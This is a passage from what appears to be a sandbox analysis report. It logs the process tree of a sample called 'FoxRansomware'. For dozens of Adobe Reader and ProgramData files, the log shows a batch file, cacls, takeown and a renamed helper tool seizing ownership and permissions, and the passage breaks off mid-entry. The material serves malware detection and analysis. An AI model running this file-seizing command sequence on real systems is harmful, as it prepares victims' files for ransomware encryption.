C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2692
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif""2⤵PID:2952
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif" /E /G Admin:F /C3⤵PID:3512
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif"3⤵
- Modifies file permissions
PID:3324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "forms_super.gif" -nobanner3⤵PID:1112
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "forms_super.gif" -nobanner4⤵PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵PID:3448
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:2916
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵
- Modifies file permissions
PID:3388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "review_browser.gif" -nobanner3⤵PID:636
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "review_browser.gif" -nobanner4⤵PID:832
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif""2⤵PID:796
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif" /E /G Admin:F /C3⤵PID:3524
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tl.gif"3⤵PID:3652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "tl.gif" -nobanner3⤵PID:3624
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "tl.gif" -nobanner4⤵PID:3644
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3520
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V""2⤵PID:3648
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V" /E /G Admin:F /C3⤵PID:3572
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-V"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1052
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "Identity-V" -nobanner3⤵PID:2656
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "Identity-V" -nobanner4⤵PID:2980
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1260
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf""2⤵PID:2524
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf" /E /G Admin:F /C3⤵PID:1520
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf"3⤵
- Modifies file permissions
PID:3224
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "MyriadPro-Bold.otf" -nobanner3⤵PID:1964
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "MyriadPro-Bold.otf" -nobanner4⤵PID:3532
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1164
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe""2⤵PID:2308
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe" /E /G Admin:F /C3⤵PID:3676
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\SC_Reader.exe"3⤵PID:4084
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "SC_Reader.exe" -nobanner3⤵PID:3684
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "SC_Reader.exe" -nobanner4⤵PID:3752
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2476
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths""2⤵PID:4092
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths" /E /G Admin:F /C3⤵PID:2644
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths"3⤵
- Modifies file permissions
PID:3360
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "brt55.ths" -nobanner3⤵PID:2312
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "brt55.ths" -nobanner4⤵PID:2340
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp""2⤵PID:1936
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp" /E /G Admin:F /C3⤵PID:3020
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.hsp"3⤵
- Modifies file permissions
PID:2912
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "usa03.hsp" -nobanner3⤵PID:2464
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "usa03.hsp" -nobanner4⤵PID:1244
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3788
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""2⤵PID:3372
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C3⤵PID:3028
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵PID:3768
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CYRILLIC.TXT" -nobanner3⤵PID:1580
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CYRILLIC.TXT" -nobanner4⤵PID:3756
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3844
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT""2⤵PID:2120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT" /E /G Admin:F /C3⤵PID:3592
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1252.TXT"3⤵PID:3668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CP1252.TXT" -nobanner3⤵PID:3864
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CP1252.TXT" -nobanner4⤵PID:3340
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1524
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer""2⤵PID:3836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer" /E /G Admin:F /C3⤵PID:1604
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer"3⤵PID:3880
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "AUMProduct.cer" -nobanner3⤵PID:1584
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "AUMProduct.cer" -nobanner4⤵PID:1396
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3872
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:1688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:2648
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵
- Modifies file permissions
PID:4056
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:3628
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:3824
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1596
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml""2⤵PID:2924
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml" /E /G Admin:F /C3⤵PID:1032
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\de-DE\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:1316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:1412
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml""2⤵PID:1652
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml" /E /G Admin:F /C3⤵PID:1008
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\es-ES\resource.xml"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2388
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "resource.xml" -nobanner3⤵PID:2492
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "resource.xml" -nobanner4⤵PID:2520
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2856
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata""2⤵PID:3124
-
C:\Windows\SysWOW64\cacls.execacls "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata" /E /G Admin:F /C3⤵PID:1792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\ProgramData\Adobe\Acrobat\9.0\Replicate\Security\directories.acrodata"3⤵
- Modifies file permissions
PID:3148
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "directories.acrodata" -nobanner3⤵PID:3696
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "directories.acrodata" -nobanner4⤵PID:2696
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3004
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif""2⤵PID:1416
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif" /E /G Admin:F /C3⤵PID:3692
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_all.gif"3⤵PID:3188
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "email_all.gif" -nobanner3⤵PID:3136
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "email_all.gif" -nobanner4⤵PID:3080
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3220
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif""2⤵PID:2460
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif" /E /G Admin:F /C3⤵PID:2688
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\open_original_form.gif"3⤵PID:2740
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "open_original_form.gif" -nobanner3⤵PID:3300
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "open_original_form.gif" -nobanner4⤵PID:3304
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3196
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif""2⤵PID:1868
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif" /E /G Admin:F /C3⤵PID:2588
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\rss.gif"3⤵PID:2728
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "rss.gif" -nobanner3⤵PID:3316
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "rss.gif" -nobanner4⤵PID:3272
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3244
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵PID:864
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:3276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵PID:3292
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵PID:1736
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵PID:1980
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:444
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf""2⤵PID:1148
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf" /E /G Admin:F /C3⤵PID:3612
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf"3⤵PID:3392
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CourierStd-Oblique.otf" -nobanner3⤵PID:2704
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "CourierStd-Oblique.otf" -nobanner4⤵PID:3400
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:216
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM""2⤵PID:232
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM" /E /G Admin:F /C3⤵PID:3428
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\SY______.PFM"3⤵PID:3420
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "SY______.PFM" -nobanner3⤵PID:860
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "SY______.PFM" -nobanner4⤵PID:876
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3996
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt""2⤵PID:2920
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt" /E /G Admin:F /C3⤵PID:2108
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt"3⤵
- Modifies file permissions
PID:2024
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner3⤵PID:2592
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "DisplayLanguageNames.en_US.txt" -nobanner4⤵PID:604
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:3492
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp""2⤵PID:3356
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp" /E /G Admin:F /C3⤵PID:3484
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can129.hsp"3⤵PID:3236
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "can129.hsp" -nobanner3⤵PID:2680
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "can129.hsp" -nobanner4⤵PID:1504
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2132
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat""2⤵PID:520
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat" /E /G Admin:F /C3⤵PID:3464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\ICU\icudt26l.dat"3⤵PID:3324
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "icudt26l.dat" -nobanner3⤵PID:3536
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "icudt26l.dat" -nobanner4⤵PID:1836
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2452
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT""2⤵PID:3888
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT" /E /G Admin:F /C3⤵PID:2392
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMANIAN.TXT"3⤵PID:3900
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "ROMANIAN.TXT" -nobanner3⤵PID:1528
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula "ROMANIAN.TXT" -nobanner4⤵PID:2764
-
-
-
C:\Users\Admin\AppData\Local\Temp\FoxRansomware\QvFgQs9v.exeQvFgQs9v.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1508
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kVSa6Bhw.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:3380
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:3156
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵
- Modifies file permissions
PID:3652
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c QvFgQs9v.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:3620
-
